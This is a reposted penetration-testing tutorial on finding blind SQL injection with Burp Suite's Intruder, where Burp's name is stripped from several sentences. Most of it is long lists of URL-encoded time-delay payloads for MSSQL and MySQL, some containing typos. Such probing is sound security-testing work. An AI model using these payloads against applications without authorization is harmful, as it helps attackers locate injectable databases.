Blind SQL Injection detection with Burp Suite-白红宇

1. Introduction

is local proxy software (man-in-the-middle application) helping a penetration tester to perform deep analysis and security checks of the HTTP conversation, between a browser and a web application. holds many useful plug-ins such as Spider, Repeater, Scanner, Decoder, … for achieving this job.

The module on which we focus on is called . With this plug-in, you are able to run customised attacks against a Web application, by sending multiple payload type at multiple positions inside the headers/body of an HTTP request, and quickly check against the information responded.

This article provides some intresting SQL payload that you can use with the Intruder module of .

Warning: Don’t use this tutorial against web applications if you are not the owner or have the authorization of the responsible.

2. SQL Injection detection

As you know, detect an SQL injection issue “manually” could be easy to do. But it is not always true for an “automatic” vulnerability scanner. That’s why we would like to give a second chance to detect such vulnerabilities with smart “customized attacks“ of .

In order to find SQL injection issues behind specific parameters of a page, we will simply use some usual time-base consuming SQL statements such as “waitfor delay” (for MS-SQL) and “benchmark()” (for MySQL), and sort the HTTP responses by “Response Time Completed“. By this way, we will able to quickly find the interesting responses among the list.

3. Burp Suite example

This is a short example of a blind SQL injection detection with (we assume you already have some knowledge of Burp suite usage. If not, enjoy this tool).

First, we send a recorded HTTP request to the Intruder module and set up the position where the payload will have to be injected (in red).

Next, we load our Payloads list (see next section) from a text file. These payloads will use the benchmarck() MySQL function, and will ask to compute MD5(1) 3,000,000 times in order to delay the response.

Important: add a white space in the list “URL-encode these characters” (on the bottom of the page) if there is no one already.

And then we start the attack (see Intruder menu).

When it will be finished, the responses will be displayed in a table format. Here we have sorted the result by “Response complete” to get immediately which payloads have triggered the vulnerability.

As you see on the previous screenshot, request 27 took more than 17 seconds to complete with the following payload:

") and 0=benchmark(3000000,MD5(1)) #

The complete SQL statement was :

SELECT * FROM user WHERE id=("1") AND 0=benchmark(3000000,MD5(1)) # OR mid="1"

4. SQL injection entry points

Because there are so many ways to write an SQL statement, we will not be able to provide an exhaustive list of payloads for each kind of SQL command and injection issue. We will try to build a good list of valid SQL payloads for the following statements:

4.1 WHERE/ASSIGNATION

Which should match statements such as:

SELECT a FROM tbl WHERE item=x payloadDELETE FROM tbl WHERE item=x payloadUPDATE tbl SET item1=x payload1 WHERE item2=x payload2

4.2. INSERT/UPDATE

Which should match statements such as:

INSERT INTO tbl(a,b,c) VALUES(x payload1, y payload2 ) UPDATE tbl(a,b) SET VALUES(x payload1, y payload2) WHERE item=value

4.3. ORDER BY/ASC/DESC

Which should match statements such as:

SELECT a FROM tbl 
    
      ORDER BY value,payload1 ASC,payload2

5. The Payloads

So far, we will try to focus on MSSQL (using “waitfor delay“ command to introduce time delay) and MySQL Server (using benchmark() function to generate long CPU activities).

For each injection, we will:

use quote, double-quote, parenthesis or blank characters to close everything written before the injected payload.

play with multiple level of parenthesis.

ending the SQL statement with { /* , – } for MSSQL, and { /* , – , # } for MySQL.

for insert only: try different number of columns for values().

5.1. Download

Download the full list of payloads:

5.2. Content:

payloads-sql-blind-MSSQL-INSERT.txt payloads-sql-blind-MSSQL-WHERE.txt payloads-sql-blind-MySQL-INSERT.txt payloads-sql-blind-MySQL-WHERE.txt payloads-sql-blind-MySQL-ORDER_BY.txt

payloads-sql-blind-MSSQL-INSERT.txt

)%20waitfor%20delay%20'0:0:20'%20/* )%20waitfor%20delay%20'0:0:20'%20-- ')%20waitfor%20delay%20'0:0:20'%20/* ')%20waitfor%20delay%20'0:0:20'%20-- ")%20waitfor%20delay%20'0:0:20'%20/* ")%20waitfor%20delay%20'0:0:20'%20-- ))%20waitfor%20delay%20'0:0:20'%20/* ))%20waitfor%20delay%20'0:0:20'%20-- '))%20waitfor%20delay%20'0:0:20'%20/* '))%20waitfor%20delay%20'0:0:20'%20-- "))%20waitfor%20delay%20'0:0:20'%20/* "))%20waitfor%20delay%20'0:0:20'%20-- ,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL)%20waifor%20delay%20'0:0:20'%20/* ',NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL)%20waifor%20delay%20'0:0:20'%20/* '),NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

payloads-sql-blind-MSSQL-WHERE.txt

waitfor delay '0:0:20' /* waitfor delay '0:0:20' -- ' waitfor delay '0:0:20' /* ' waitfor delay '0:0:20' -- " waitfor delay '0:0:20' /* " waitfor delay '0:0:20' -- ) waitfor delay '0:0:20' /* ) waitfor delay '0:0:20' -- )) waitfor delay '0:0:20' /* )) waitfor delay '0:0:20' -- ))) waitfor delay '0:0:20' /* ))) waitfor delay '0:0:20' -- )))) waitfor delay '0:0:20' /* )))) waitfor delay '0:0:20' -- ))))) waitfor delay '0:0:20' -- )))))) waitfor delay '0:0:20' -- ') waitfor delay '0:0:20' /* ') waitfor delay '0:0:20' -- ") waitfor delay '0:0:20' /* ") waitfor delay '0:0:20' -- ')) waitfor delay '0:0:20' /* ')) waitfor delay '0:0:20' -- ")) waitfor delay '0:0:20' /* ")) waitfor delay '0:0:20' -- '))) waitfor delay '0:0:20' /* '))) waitfor delay '0:0:20' -- "))) waitfor delay '0:0:20' /* "))) waitfor delay '0:0:20' -- ')))) waitfor delay '0:0:20' /* ')))) waitfor delay '0:0:20' -- ")))) waitfor delay '0:0:20' /* ")))) waitfor delay '0:0:20' -- '))))) waitfor delay '0:0:20' /* '))))) waitfor delay '0:0:20' -- "))))) waitfor delay '0:0:20' /* "))))) waitfor delay '0:0:20' -- ')))))) waitfor delay '0:0:20' /* ')))))) waitfor delay '0:0:20' -- ")))))) waitfor delay '0:0:20' /* ")))))) waitfor delay '0:0:20' --

payloads-sql-blind-MySQL-INSERT.txt

+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL))%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

payloads-sql-blind-MySQL-WHERE.txt

and 0=benchmark(3000000,MD5(1))%20/* and 0=benchmark(3000000,MD5(1))%20-- and 0=benchmark(3000000,MD5(1))%20%23 ' and 0=benchmark(3000000,MD5(1))%20/* ' and 0=benchmark(3000000,MD5(1))%20-- ' and 0=benchmark(3000000,MD5(1))%20%23 " and 0=benchmark(3000000,MD5(1))%20/* " and 0=benchmark(3000000,MD5(1))%20-- " and 0=benchmark(3000000,MD5(1))%20%23 ) and 0=benchmark(3000000,MD5(1))%20/* ) and 0=benchmark(3000000,MD5(1))%20-- ) and 0=benchmark(3000000,MD5(1))%20%23 )) and 0=benchmark(3000000,MD5(1))%20/* )) and 0=benchmark(3000000,MD5(1))%20-- )) and 0=benchmark(3000000,MD5(1))%20%23 ))) and 0=benchmark(3000000,MD5(1))%20/* ))) and 0=benchmark(3000000,MD5(1))%20-- ))) and 0=benchmark(3000000,MD5(1))%20%23 )))) and 0=benchmark(3000000,MD5(1))%20/* )))) and 0=benchmark(3000000,MD5(1))%20-- )))) and 0=benchmark(3000000,MD5(1))%20%23 ') and 0=benchmark(3000000,MD5(1))%20/* ') and 0=benchmark(3000000,MD5(1))%20-- ') and 0=benchmark(3000000,MD5(1))%20%23 ") and 0=benchmark(3000000,MD5(1))%20/* ") and 0=benchmark(3000000,MD5(1))%20-- ") and 0=benchmark(3000000,MD5(1))%20%23 ')) and 0=benchmark(3000000,MD5(1))%20/* ')) and 0=benchmark(3000000,MD5(1))%20-- ')) and 0=benchmark(3000000,MD5(1))%20%23 ")) and 0=benchmark(3000000,MD5(1))%20/* ")) and 0=benchmark(3000000,MD5(1))%20-- ")) and 0=benchmark(3000000,MD5(1))%20%23 '))) and 0=benchmark(3000000,MD5(1))%20/* '))) and 0=benchmark(3000000,MD5(1))%20-- '))) and 0=benchmark(3000000,MD5(1))%20%23 "))) and 0=benchmark(3000000,MD5(1))%20/* "))) and 0=benchmark(3000000,MD5(1))%20-- "))) and 0=benchmark(3000000,MD5(1))%20%23 ')))) and 0=benchmark(3000000,MD5(1))%20/* ')))) and 0=benchmark(3000000,MD5(1))%20-- ')))) and 0=benchmark(3000000,MD5(1))%20%23 ")))) and 0=benchmark(3000000,MD5(1))%20/* ")))) and 0=benchmark(3000000,MD5(1))%20-- ")))) and 0=benchmark(3000000,MD5(1))%20%23

payloads-sql-blind-MySQL-ORDER_BY.txt

,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

6. The End

Enjoy this tutorial and these SQL payloads.

New payloads suggestions are welcome !

本文转hackfreer51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/499917，如需转载请自行联系原作者